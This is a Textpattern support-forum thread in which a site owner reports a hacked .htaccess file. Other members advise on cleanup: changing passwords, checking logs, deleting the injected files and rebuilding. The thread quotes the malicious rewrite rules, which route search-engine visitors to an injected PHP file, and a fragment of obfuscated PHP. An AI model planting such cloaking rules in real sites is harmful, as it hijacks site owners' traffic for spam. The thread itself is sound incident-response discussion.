htaccess attack

detail · 2015-04-30 02:06:52

I’ve discovered a few hours ago that anything other than the homepage of my websites had disappeared and were replaced with this message.

Not Found

The requested URL /huts was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Apache Server at www.tramping.net.nz Port 80

When I had a look at my htaccess file I found it had been replaced with this, I certainly haven’t touched this.

RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^([^/]*)/$ demarcate-densities.php?$1 [L]

I replaced that with the proper htaccess file and now all websites are working perfectly once again.

What is happening here and how can I stop it happening again?

gomedia · 2015-04-30 05:01:02

To start with, you should change your FTP password – in case that is how they got in. Your hosting provider might be able to shed some light on what happened (if they look in their logs).

gaekwad · 2015-04-30 09:28:27

There are upwards of 1200 other sites on your shared server – it’s likely something among them was compromised or your login details were compromised. Recommend contacting the host to see who else (if anyone) is reporting a breach.

+1 for what gomedia says – change your password. Check your FTP logs, if you can do such a thing.

gaekwad · 2015-04-30 09:29:30

PS: does that demarcate-densities.php file exist in the root of your server? It looks like a dictionary-generated filename.

Last edited by gaekwad (2015-04-30 09:29:58)

detail · 2015-04-30 10:38:48

gaekwad wrote #290301:

PS: does that demarcate-densities.php file exist in the root of your server? It looks like a dictionary-generated filename.

Yeah, thanks for pointing that out.

Should get rid of it?

gaekwad · 2015-04-30 10:42:12

Two schools of thought here: if you want to know what it does, take a copy and examine it (safely) offline. You may find some background info by searching for the text strings in a search engine. If you just want to get your site back to full operation, delete it – it’s nothing to do with Textpattern. I suspect your hosting company will just want to resume normal service and not actively investigate the breach.

detail · 2015-04-30 10:46:22

gaekwad wrote #290305:

If you just want to get your site back to full operation, delete it – it’s nothing to do with Textpattern.

I’ll have a look but it does seem to be minified.

Thanks for that advice. It’s taken 5 years on that server for someone to crack it.

detail · 2015-04-30 11:01:57

I’ve just been looking at other stray code.

There’s a file that’s called

ghmftsng.php

which is just a whole heap of mumbo jumbo like:

$incontrollable= 'c';$crossers = 'V';
$dull = 'U:duaHnp)'; $biennial = 'e';

and also something called

googlede437 a8d2bdea8d3.html

which I don’t really want to look at.

I guess these should go as well.

gaekwad · 2015-04-30 11:46:46

Rebuild from a clean Textpattern instance, if that’s viable. Off the top of my head:

backup your database
audit and backup your images and files directories
snag your textpattern/config.php for your database details
backup any external (non-Textpattern) stuff you’re using, like stylesheets etc
nuke the files on your site
reinstall Textpattern, changing your login password in the process
import your old database
upload files and images

Last edited by gaekwad (2015-04-30 12:16:41)

jakob · 2015-04-30 11:52:18

detail wrote #290307:

and also something called

googlede437a8d2bdea8d3.html...

This could be a google webmaster site verification file. They often look something like that. If you open it in a normal code editor, you’ll see google-site-verification: googlede437a8d2bdea8d3.html or something along those lines.

You can use unminify to unminify the other code.

Textpattern CMS

Textpattern CMS support forum

#1 2015-04-30 02:06:52

htaccess attack

#2 2015-04-30 05:01:02

Re: htaccess attack

#3 2015-04-30 09:28:27

Re: htaccess attack

#4 2015-04-30 09:29:30

Re: htaccess attack

#5 2015-04-30 10:38:48

Re: htaccess attack

gaekwad wrote #290301:

#6 2015-04-30 10:42:12

Re: htaccess attack

#7 2015-04-30 10:46:22

Re: htaccess attack

gaekwad wrote #290305:

#8 2015-04-30 11:01:57

Re: htaccess attack

#9 2015-04-30 11:46:46

Re: htaccess attack

#10 2015-04-30 11:52:18

Re: htaccess attack

detail wrote #290307:

Board footer